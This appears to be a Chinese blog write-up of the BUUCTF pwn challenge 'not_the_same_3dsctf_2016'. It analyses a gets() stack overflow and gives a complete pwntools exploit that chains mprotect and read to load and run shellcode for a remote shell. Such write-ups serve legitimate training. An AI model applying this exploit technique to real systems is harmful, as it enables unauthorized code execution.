not the same 3dsctf 2016

2023-11-16 11:23

|

645

|

0

157 字

|

3 分钟

not the same 3dsctf 2016

前提

查看文件保护

[*] '/root/pwn/buuctf/not_the_same_3dsctf_2016/not_the_same_3dsctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+Fh] [ebp-2Dh]

  printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
  gets(&v4);
  return 0;
}

思路分析

目前信息：
- main函数内明显的栈溢出漏洞
- 函数表内有mprotect函数
- No PIE
- NX 保护开启
思路：
- 可栈溢出，有mprotect函数，考虑劫持程序流到mprotect函数处给一段地址区域添加读写及执行权限，将shellcode写入该处，二次返回该处执行获得shell

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/not_the_same_3dsctf_2016/not_the_same_3dsctf_2016'
io = remote('node4.buuoj.cn', 26190)
# io = process(pwnfile)
elf = ELF(pwnfile)
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
# 使用read向内存中写入shellcode
padding = 45
mem_addr = 0x080EB000
mem_len = 0x1000
mem_type = 7
pop_3times_ret = 0x0806FCC8
# pop 3次将上个函数的3个参数弹出，调整栈布局
shellcode = asm(shellcraft.sh())
payload = flat(['a'*padding, mprotect_addr, pop_3times_ret, mem_addr, mem_len,mem_type, read_addr, pop_3times_ret, 0, mem_addr, 0x100, mem_addr])
io.sendline(payload)
io.sendline(shellcode)
# 发送shellcode
io.interactive()

Buuctf Pwn StackOverflow

暂无评论

发送评论编辑评论

悄悄话

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!